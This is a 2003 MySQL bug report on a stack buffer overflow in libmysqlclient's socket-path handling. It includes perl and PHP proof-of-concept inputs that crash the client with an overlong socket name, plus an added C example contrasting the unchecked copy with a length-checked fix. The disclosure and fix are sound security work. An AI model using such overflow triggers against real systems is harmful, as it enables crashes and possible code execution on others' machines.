Bug #564 mysql_real_connect buffer overflow in unix socket name.
Submitted: 1 Jun 2003 19:55    Modified: 4 Jun 2003 8:04
Reporter: pokleyzz sakamaniaka
Status: Closed
Category: MySQL Server    Severity: S2 (Serious)
Version: All    OS: Any (All)
Assigned to: Jani Tolonen

[1 Jun 2003 19:55] pokleyzz sakamaniaka
Description:
We just found a minor security bug in libmysqlclient. It is in the mysql_real_connect 
function in libmysql.c. This bug can easily be produced by supplying a socket name > 250 chars. It is a stack-based buffer overflow where the user can easily overwrite EIP. 

ex:
 mysql -S `perl -e 'print "a" x 256'` -hlocalhost

This bug has been successfully tested on safe_mode PHP (without command execution allowed) in our latest Geeklog bug (where a user can upload *.php files)
http://archives.neohapsis.com/archives/vulnwatch/2003-q2/0092.html

------exploit code -------------------
<?php
    // Build a 256-byte socket name (the overlong "A" string from the report).
    $buff = '';
    for ($i = 0; $i < 256; $i++)
        $buff .= "A";
    // Hand it to libmysqlclient as the default unix socket path, then connect.
    ini_set("mysql.default_socket", $buff);
    mysql_connect("localhost", "root", "1234");
?>
--------------------------------------

Regards,

pokleyzz@scan-associates.net
http://www.scan-associates.net

How to repeat:
i) mysql -S `perl -e 'print "a" x 256'` -hlocalhost

ii)
------exploit code -------------------
<?php
    // Build a 256-byte socket name (the overlong "A" string from the report).
    $buff = '';
    for ($i = 0; $i < 256; $i++)
        $buff .= "A";
    // Hand it to libmysqlclient as the default unix socket path, then connect.
    ini_set("mysql.default_socket", $buff);
    mysql_connect("localhost", "root", "1234");
?>
--------------------------------------
[4 Jun 2003 5:36] Lenz Grimmer
Jani, can you please have a look at this soon? Thanks!
[4 Jun 2003 5:43] Lenz Grimmer
BTW: I could not initially reproduce it with the provided Perl string (using 256 chars). I needed 322 chars 
to make it segfault in the standard 3.23.56 and 4.0.13 distribution.
[4 Jun 2003 6:17] Georg Richter
I think the problem is a buffer overflow in the structure UNIX_addr:

-> strmov(UNIXaddr.sun_path, unix_socket);

sun_path is defined in sys/un.h:

/* Structure describing the address of an AF_LOCAL (aka AF_UNIX) socket.  */
struct sockaddr_un
  {
    __SOCKADDR_COMMON (sun_);
    char sun_path[108];		/* Path name.  */
  };

Georg
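The copy Georg points at, and a length-checked replacement for it, as an added example written for this page (it is not MySQL's code and does not reproduce libmysql.c). strmov is MySQL's strcpy-like helper that returns the end pointer; the example uses memcpy after an explicit length check instead. sun_path_overrun() computes how many bytes an unchecked copy of a name of the given length (plus its terminating NUL) would write past the end of sun_path; set_unix_socket_path() is the hardened form that refuses anything that does not fit. The function names, the probe helper and the sample lengths (including the 256 and 322 from the thread) are this example's own; the 322-character threshold Lenz observed depends on the stack layout of the binary and is not modelled here.

```c
/* Added example (not MySQL's code): the unchecked copy into sun_path
 * versus a length-checked replacement. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/un.h>

/* Capacity of sun_path on this platform (108 on glibc, 104 on the BSDs). */
#define SUN_PATH_CAP (sizeof ((struct sockaddr_un *)0)->sun_path)

/* Bytes the unchecked copy (strmov/strcpy of the name plus its NUL) would
 * write past the end of sun_path; 0 when the name fits. */
size_t sun_path_overrun(size_t name_len)
{
    size_t need = name_len + 1;            /* include terminating NUL */
    return need > SUN_PATH_CAP ? need - SUN_PATH_CAP : 0;
}

/* Hardened version: reject names that do not fit, then copy exactly n+1 bytes. */
int set_unix_socket_path(struct sockaddr_un *addr, const char *path)
{
    size_t n = strlen(path);
    if (n >= SUN_PATH_CAP)                 /* would truncate or overflow */
        return -1;
    memset(addr, 0, sizeof *addr);
    addr->sun_family = AF_UNIX;
    memcpy(addr->sun_path, path, n + 1);
    return 0;
}

/* Build a socket name of `len` bytes of 'a' (the report's test string) and
 * report whether the hardened setter accepts it: 1 accepted, 0 rejected. */
int probe_socket_name(size_t len)
{
    struct sockaddr_un addr;
    char *name = malloc(len + 1);
    int ok;
    if (!name)
        return 0;
    memset(name, 'a', len);
    name[len] = '\0';
    ok = set_unix_socket_path(&addr, name) == 0;
    free(name);
    return ok;
}

int main(void)
{
    /* Sample lengths: two that fit, the first that does not, and the two
     * lengths discussed in the thread. */
    size_t lens[] = { 20, 107, 108, 256, 322 };
    size_t i;
    printf("sun_path capacity on this platform: %zu bytes\n", SUN_PATH_CAP);
    for (i = 0; i < sizeof lens / sizeof lens[0]; i++)
        printf("name of %3zu bytes: overrun %3zu bytes, hardened setter %s\n",
               lens[i], sun_path_overrun(lens[i]),
               probe_socket_name(lens[i]) ? "accepts" : "rejects");
    return 0;
}
```

The check is `n >= sizeof sun_path`, not `>`, because the terminating NUL also has to fit; silently truncating with strncpy would instead connect to a different path than the caller asked for, so rejecting is the right failure mode for a connect routine.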
[4 Jun 2003 8:04] Jani Tolonen
Fixed. Will be in 4.0 and 4.1 soon.
Regards,
Jani
[17 Apr 2009 3:36] James Day
If you believe that you are vulnerable to this you should upgrade to 4.1 for a full fix, not stick to 4.0. You aren't vulnerable with any version if your server is running on Windows or any other platform that doesn't support unix-style sockets.